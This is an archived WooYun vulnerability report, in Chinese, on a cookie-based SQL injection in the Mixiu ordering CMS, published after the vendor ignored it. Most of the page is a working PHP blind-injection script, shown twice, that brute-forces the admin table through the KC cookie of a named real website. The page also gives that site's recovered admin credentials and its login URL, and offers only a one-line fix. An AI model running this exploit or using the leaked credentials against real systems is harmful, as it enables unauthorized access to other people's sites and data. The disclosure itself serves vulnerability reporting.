当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032528

漏洞标题:米秀订餐系统系统存在SQL注入漏洞

相关厂商:米秀订餐系统

漏洞作者: IT P民

提交时间:2013-07-30 18:22

修复时间:2013-10-28 18:23

公开时间:2013-10-28 18:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

该订餐系统是一个cms,有一部分订餐机构在使用。会员系统直接使用了cookie,并没有过滤,改cookie可以构造sql语句并成功注入,通过猜测管理员表字段,能够暴力破解所有管理员的用户和密码

详细说明:

QQ20130727-5.png


QQ20130727-6.png


构造cookie暴力破解用户密码ascii码

QQ20130727-2.png


构造cookie暴力破解用户名ascii码

QQ20130727-3.png


破解后登陆系统

QQ20130727-4.png


破解代码实例:

<?php
header("Content-Type:text/html;charset=UTF-8");
$tuCurl = curl_init();
curl_setopt($tuCurl, CURLOPT_URL, "http://www.jiajiachufang.com/index.asp");
curl_setopt($tuCurl, CURLOPT_HEADER, TRUE);
curl_setopt($tuCurl, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($tuCurl, CURLOPT_RETURNTRANSFER, TRUE);
for ($i=1;$i<=5;$i++) {
	if (isset($match)) {
		unset($match);
	}
	for ($j=0;$j<128;$j++) {
		if (isset($match)) {
			continue;
		}
		$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20(select%20top%201%20asc(mid(admin,{$i},1))%20from%20admin)={$j}%20and%20'1'='1";
		
		//$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20exists(select%20top%201%20[username]%20from%20admin)={$i}%20and%20'1'='1";
		
		curl_setopt($tuCurl, CURLOPT_HTTPHEADER, array($inject));
		
		$tuData = curl_exec($tuCurl);
		$httpCode = curl_getinfo($tuCurl, CURLINFO_HTTP_CODE);
		if ($httpCode == 200) {
			var_dump($inject);
			echo "{$i}:{$j} \n";
			$match = true;
		}
		
	}
	
}
echo "done\n";

漏洞证明:

<?php
header("Content-Type:text/html;charset=UTF-8");
$tuCurl = curl_init();
curl_setopt($tuCurl, CURLOPT_URL, "http://www.jiajiachufang.com/index.asp");
curl_setopt($tuCurl, CURLOPT_HEADER, TRUE);
curl_setopt($tuCurl, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($tuCurl, CURLOPT_RETURNTRANSFER, TRUE);
for ($i=1;$i<=5;$i++) {
	if (isset($match)) {
		unset($match);
	}
	for ($j=0;$j<128;$j++) {
		if (isset($match)) {
			continue;
		}
		$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20(select%20top%201%20asc(mid(admin,{$i},1))%20from%20admin)={$j}%20and%20'1'='1";
		
		//$inject = "Cookie:ASPSESSIONIDCCTASSQT=AAOKAPPAMNONKMBBLFLDABIP; KC=username=1'%20and%20exists(select%20top%201%20[username]%20from%20admin)={$i}%20and%20'1'='1";
		
		curl_setopt($tuCurl, CURLOPT_HTTPHEADER, array($inject));
		
		$tuData = curl_exec($tuCurl);
		$httpCode = curl_getinfo($tuCurl, CURLINFO_HTTP_CODE);
		if ($httpCode == 200) {
			var_dump($inject);
			echo "{$i}:{$j} \n";
			$match = true;
		}
		
	}
	
}
echo "done\n";


按照上述步骤获得 用户名admin,密码解密之后是 000000
http://www.jiajiachufang.com/admin 可登陆

QQ20130727-4.png

修复方案:

对客户端cookie过滤

版权声明:转载请注明来源 IT P民@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝